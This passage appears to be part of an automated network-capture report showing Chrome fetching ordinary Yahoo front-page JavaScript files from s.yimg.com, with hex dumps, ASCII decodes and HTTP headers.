                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 6c 65 74 65 64 45 76 65 6e 74 29 28 22 22 2c 21 31 29 3b 76 61 72 20 45 2c 54 3d 72 2e 63 6f 6f 6b 69 65 3b 76 6f 69 64 20 30 3d 3d 3d 54 26 26 28 54 3d 43 2e 63 6f 6f 6b 69 65 29 2c 70 2e 69 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 54 29 2c 45 3d 28 30 2c 69 2e 64 65 63 69 64 65 57 69 74 68 50 61 72 73 65 64 43 6f 6f 6b 69 65 73 29 28 70 2e 69 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 73 29 2c 70 2e 63 6f 6f 6b 69 65 52 65 73 75 6c 74 3d 45 3b 76 61 72 20 6b 3d 28 30 2c 6d 2e 67 65 74 47 70 63 50 61 72 73 65 64 43 6f 6f 6b 69 65 73 29 28 29 2c 41 3d 28 30 2c 6d 2e 64 65 66 61 75 6c 74 29 28 7b 63 6f 6e 73 65 6e 74 43 6f 6f 6b 69 65 73 3a 6b 2c 66 65 61 74 75 72 65 3a 22 75 6e 64 65 72 61 67 65 22 7d 29 2c 79 3d 70 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: letedEvent)("",!1);var E,T=r.cookie;void 0===T&&(T=C.cookie),p.initialCookies=(0,o.default)(T),E=(0,i.decideWithParsedCookies)(p.initialCookies),p.cookieResult=E;var k=(0,m.getGpcParsedCookies)(),A=(0,m.default)({consentCookies:k,feature:"underage"}),y=p;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6c 69 66 65 73 74 79 6c 65 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 66 69 6e 61 6e 63 65 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 6f 6e 6c 69 6e 65 2d 63 6c 61 73 73 65 73 2f 66 69 74 6e 65 73 73 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 66 6f 6f 64 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 67 61 6d 65 73 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .yahoo.com/","https://www.yahoo.com/lifestyle/","https://www.aol.com/","https://www.aol.com/finance/","https://www.aol.com/entertainment/","https://www.aol.com/online-classes/fitness/","https://www.aol.com/food/","https://www.aol.com/games/","https://www.


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    86192.168.2.44984987.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC589OUTGET /aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: zti178Ospk8b0VSgRKO+jVsNLLluxx17krAbqil3CFqtSZrVPY17Uhp/3Z87NIs6GUpUnJZhZd0=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: D7V0SSSE5WK2W7XD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Fri, 23 Aug 2024 02:36:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 04 Aug 2022 04:32:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "12732500bc8e47693f0d777bbe88001c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: ktIqZY5t35wTM4d07XFqB.S0kDb7QpBg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 1615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 3336260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 22 66 65 61 74 75 72 65 62 61 72 49 64 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 72 65 61 63 74 2d 77 61 66 65 72 2d 46 65 61 74 75 72 65 62 61 72 22 29 5b 30 5d 3b 69 66 28 65 29 7b 69 66 28 65 2e 63 6c 61 73 73 4c 69 73 74 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 75 74 6f 2d 63 6c 6f 73 65 22 29 29 7b 76 61 72 20 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 66 65 61 74 75 72 65 62 61 72 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-conte
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC315INData Raw: 73 6c 61 74 65 59 28 22 2b 72 2b 22 29 22 29 7d 29 29 2c 75 28 29 29 7d 76 61 72 20 66 3d 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 73 63 72 6f 6c 6c 2d 74 6f 2d 73 68 6f 77 22 29 3b 63 6f 6e 73 74 20 6d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 63 72 6f 6c 6c 2d 74 68 72 65 73 68 6f 6c 64 22 29 7c 7c 31 38 30 30 3b 69 66 28 66 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 29 7b 63 6f 6e 73 74 20 77 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 2e 74 68 72 6f 74 74 6c 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 73 63 72 6f 6c 6c 59 3e 3d 6d 26 26 28 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 56 28 68 29 22 29 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 6d 6f 76 65 4c 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: slateY("+r+")")})),u())}var f=e.classList.contains("scroll-to-show");const m=e.getAttribute("data-scroll-threshold")||1800;if(f&&window.wafer){const w=window.wafer.utils.throttle((function(t){t.scrollY>=m&&(e.classList.remove("V(h)"),window.wafer.removeLi


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    87192.168.2.44984687.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC415OUTGET /aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: imRGzXJPuPNClQHQYPV4UJ2kH3AHhkP9CR0WBaQtXaO4JZaRgbVTztwQz1eaYaKVv9PE2Kbzu7FeJQnvIRda/qeUrSCEAKUjAyL+shGrreA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: QFS22TNAJ9SZQ9V4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 17:17:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 22 Nov 2023 02:30:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "bcda778b736c3a054af62f437b536e78"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: 4nvcVa.IxmhX7xaj3DD1aoyDc2oHnofW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 4249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 259430
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 5f 74 79 70 65 6f 66 28 65 29 7b 72 65 74 75 72 6e 20 5f 74 79 70 65 6f 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 5f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 77 2e 77 61 66 65 72 2c 73 3d 21 28 21 77 69 6e 64 6f 77 2e 77 61 66 65 72 7c 7c 21 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 29 2c 67 3d 22 22 2e 63 6f 6e 63 61 74 28 22 2f 5f 74 64 5f 61 70 69 2f 62 65 61 63 6f 6e 22 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 69 29 2e 63 6f 6e 63 61 74 28 75 28 29 2c 22 26 73 69 74 65 3d 22 29 2e 63 6f 6e 63 61 74 28 66 2e 73 69 74 65 2c 22 26 63 6f 6e 6e 65 63 74 69 6f 6e 3d 22 29 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 77 28 29 29 29 2c 22 26 68 61 73 57 66 3d 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 68 61 73 57 66 52 3d 22 29 2e 63 6f 6e 63 61 74 28 73 29 3b 76 28 67 29 2c 72 2e 5f 5f 74 65 73 74 45 72 72 6f 72 26 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: w.wafer,s=!(!window.wafer||!window.wafer.ready),g="".concat("/_td_api/beacon","/").concat(e,"?").concat(i).concat(u(),"&site=").concat(f.site,"&connection=").concat(escape(JSON.stringify(w())),"&hasWf=").concat(c,"&hasWfR=").concat(s);v(g),r.__testError&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 28 64 3e 33 29 26 26 28 21 72 2e 6e 61 76 69 67 61 74 6f 72 7c 7c 21 31 21 3d 3d 72 2e 6e 61 76 69 67 61 74 6f 72 2e 6f 6e 4c 69 6e 65 29 26 26 65 29 7b 76 61 72 20 6e 3d 65 2e 6d 65 74 61 2c 74 3d 65 2e 6e 61 6d 65 2c 6f 3d 65 2e 73 74 61 63 6b 2c 61 3d 6f 26 26 6f 2e 6d 65 73 73 61 67 65 7c 7c 6f 7c 7c 22 22 2c 69 3d 22 2f 22 2e 63 6f 6e 63 61 74 28 66 2e 62 65 61 63 6f 6e 50 61 74 68 2c 22 3f 65 72 72 3d 22 29 2e 63 6f 6e 63 61 74 28 74 2c 22 26 62 65 61 63 6f 6e 54 79 70 65 3d 77 61 66 65 72 5f 65 72 72 26 69 6e 66 6f 3d 22 29 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6e 29 29 2c 22 26 73 74 61 63 6b 3d 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: },m=function(e){if(!(d>3)&&(!r.navigator||!1!==r.navigator.onLine)&&e){var n=e.meta,t=e.name,o=e.stack,a=o&&o.message||o||"",i="/".concat(f.beaconPath,"?err=").concat(t,"&beaconType=wafer_err&info=").concat(escape(JSON.stringify(n)),"&stack=").concat(a,"&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC349INData Raw: 63 65 73 43 72 65 61 74 6f 72 3b 72 2e 59 41 48 4f 4f 2e 75 74 69 6c 73 2e 74 72 61 63 65 73 3d 6e 2e 63 72 65 61 74 65 54 72 61 63 65 73 49 6e 73 74 61 6e 63 65 28 7b 74 72 61 63 65 73 3a 7b 67 6c 6f 62 61 6c 41 74 74 72 69 62 75 74 65 73 3a 7b 61 75 74 68 65 64 3a 4f 2e 61 75 74 68 65 64 7c 7c 22 30 22 2c 62 75 63 6b 65 74 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 41 29 26 26 41 2e 6a 6f 69 6e 28 22 2c 22 29 7c 7c 41 2c 63 6f 6e 6e 65 63 74 3a 22 22 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 77 28 29 29 29 29 2e 63 6f 6e 63 61 74 28 75 28 29 29 2c 64 65 76 69 63 65 3a 4f 2e 64 65 76 69 63 65 2c 65 6e 76 3a 4f 2e 65 6e 76 7c 7c 22 70 72 6f 64 75 63 74 69 6f 6e 22 2c 6c 61 6e 67 3a 4f 2e 6c 61 6e 67 2c 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: cesCreator;r.YAHOO.utils.traces=n.createTracesInstance({traces:{globalAttributes:{authed:O.authed||"0",bucket:Array.isArray(A)&&A.join(",")||A,connect:"".concat(escape(JSON.stringify(w()))).concat(u()),device:O.device,env:O.env||"production",lang:O.lang,r


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    88192.168.2.44985087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC390OUTGET /aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: iBoOCqdZu1RBcmySgYwxrhx+9QqzTDx1HtkCQA/xexkE9OPzuvJF+xmqMl87kRg1dMBMLgv6Fd4=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 2J6GFQ6XDKGP9TVD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 18:35:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 17 Sep 2024 14:42:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "46ec7cd52ee9f5c1236b0dea5072690a"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: EECuZaYozuD3S0mv5mnkXQno9EaB0JwF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 15774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 254751
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 74 3d 65 2e 62 61 73 65 7c 7c 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 2c 6f 29 7b 69 66 28 65 29 72 65 74 75 72 6e 20 6f 3d 6f 7c 7c 7b 7d 2c 65 2e 75 74 69 6c 73 2e 65 6c 65 6d 65 6e 74 49 6e 56 69 65 77 28 6e 2c 6f 2c 74 2e 76 69 65 77 70 6f 72 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 2c 6f 2c 69 29 7b 72 65 74 75 72 6e 7b 63 6c 65 61 6e 3a 74 2c 64 65 73 74 3a 6e 2c 68 3a 69 2c 6d 65 74 61 53 69 7a 65 3a 21 30 2c 70 6f 73 3a 65 2c 73 75 70 70 6f 72 74 73 3a 21 31 2c 77 3a 6f 7d 7d 76 61 72 20 69 3d 7b 63 6f 6e 74 65 78 74 3a 7b 62 75 63 6b 65 74 3a 22 22 2c 62 75 63 6b 65 74 49 64 3a 22 22 2c 64 65 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(){"use strict";var e=window.wafer,t=e.base||{};function n(n,o){if(e)return o=o||{},e.utils.elementInView(n,o,t.viewport)}function o(e,t,n,o,i){return{clean:t,dest:n,h:i,metaSize:!0,pos:e,supports:!1,w:o}}var i={context:{bucket:"",bucketId:"",dev
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 73 73 6c 3a 74 2e 73 73 6c 2c 75 6c 74 3a 74 2e 75 6c 74 7d 3b 6d 2e 61 64 64 28 64 29 2c 6d 2e 65 76 65 6e 74 28 62 29 7d 7d 28 61 29 7d 29 29 2c 28 73 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 43 2b 28 6e 75 6c 6c 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 70 6f 73 29 29 29 7c 7c 66 2e 65 6e 61 62 6c 65 47 41 4d 41 64 73 29 7b 65 3d 7b 6f 66 66 73 65 74 58 3a 30 2c 6f 66 66 73 65 74 59 3a 70 61 72 73 65 49 6e 74 28 74 2e 6f 66 66 73 65 74 2c 31 30 29 7c 7c 31 30 30 7d 2c 68 2e 6f 6e 28 77 2c 44 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 65 77 65 72 4f 70 65 6e 65 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 52 3d 21 30 7d 29 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 65 61 6d 6c 65 73 73 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ssl:t.ssl,ult:t.ult};m.add(d),m.event(b)}}(a)})),(s=d.getElementById(C+(null==r?void 0:r.pos)))||f.enableGAMAds){e={offsetX:0,offsetY:parseInt(t.offset,10)||100},h.on(w,D),c.addEventListener("viewerOpened",(function(){R=!0})),c.addEventListener("seamless:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 29 29 26 26 28 69 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 48 74 2d 70 6c 2d 4c 44 52 42 22 29 2c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 48 74 2d 70 6c 2d 4c 52 45 43 22 29 29 7d 69 66 28 74 2e 4d 4f 4e 32 26 26 74 2e 4c 52 45 43 33 26 26 74 2e 4c 52 45 43 34 29 7b 76 61 72 20 61 3d 74 2e 4d 4f 4e 32 2e 76 61 6c 69 64 41 64 2c 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 64 61 2d 4c 52 45 43 33 22 29 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 64 61 2d 4c 52 45 43 34 22 29 3b 61 3f 28 73 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 44 28 6e 29 22 29 2c 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 44 28 6e 29 22 29 29 3a 28 73 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ))&&(i.classList.remove("Ht-pl-LDRB"),i.classList.remove("Ht-pl-LREC"))}if(t.MON2&&t.LREC3&&t.LREC4){var a=t.MON2.validAd,s=document.getElementById("sda-LREC3"),r=document.getElementById("sda-LREC4");a?(s.classList.add("D(n)"),r.classList.add("D(n)")):(s.
